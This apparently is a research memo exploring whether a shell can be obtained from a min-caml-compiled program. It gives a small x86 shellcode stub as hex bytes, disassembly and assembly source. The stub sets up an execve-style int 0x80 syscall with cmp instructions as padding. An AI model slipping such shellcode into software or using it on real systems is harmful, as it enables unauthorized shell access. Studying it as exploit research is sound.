メモ of min-camlのプログラムからシェルが取れるか？ https://cookies.hatenablog.jp/entry/2018/12/16/120213

min-caml-syscall.bin.txt

52 53 90 3c bb 89 e3 51 3c b9 53 89 e1 3c ba 31 d2 cd 80

min-caml-syscall.disasm

min-caml-syscall.o:     file format elf32-i386


Disassembly of section .text:

00000000 <_start>:
   0:	52                   	push   %edx
   1:	53                   	push   %ebx
   2:	90                   	nop
   3:	3c bb                	cmp    $0xbb,%al
   5:	89 e3                	mov    %esp,%ebx
   7:	51                   	push   %ecx
   8:	3c b9                	cmp    $0xb9,%al
   a:	53                   	push   %ebx
   b:	89 e1                	mov    %esp,%ecx
   d:	3c ba                	cmp    $0xba,%al
   f:	31 d2                	xor    %edx,%edx
  11:	cd 80                	int    $0x80

min-caml-syscall.s

# gcc -m32 -O0  -c min-caml-syscall.s && objdump -S --disassemble min-caml-syscall.o > min-caml-syscall.disasm 
# ruby -e 'puts ARGF.readlines.map{|s|s.split("\t")[1]&.strip}.join(" ").strip' min-caml-syscall.disasm > min-caml-syscall.bin.txt

.intel_syntax noprefix
        .global _start

        .text
_start:
    push   edx
    push   ebx
    nop
    cmp    al,0xbb
    mov    ebx,esp
    push   ecx
    cmp    al,0xb9
    push   ebx
    mov    ecx,esp
    cmp    al,0xba
    xor    edx,edx
    int    0x80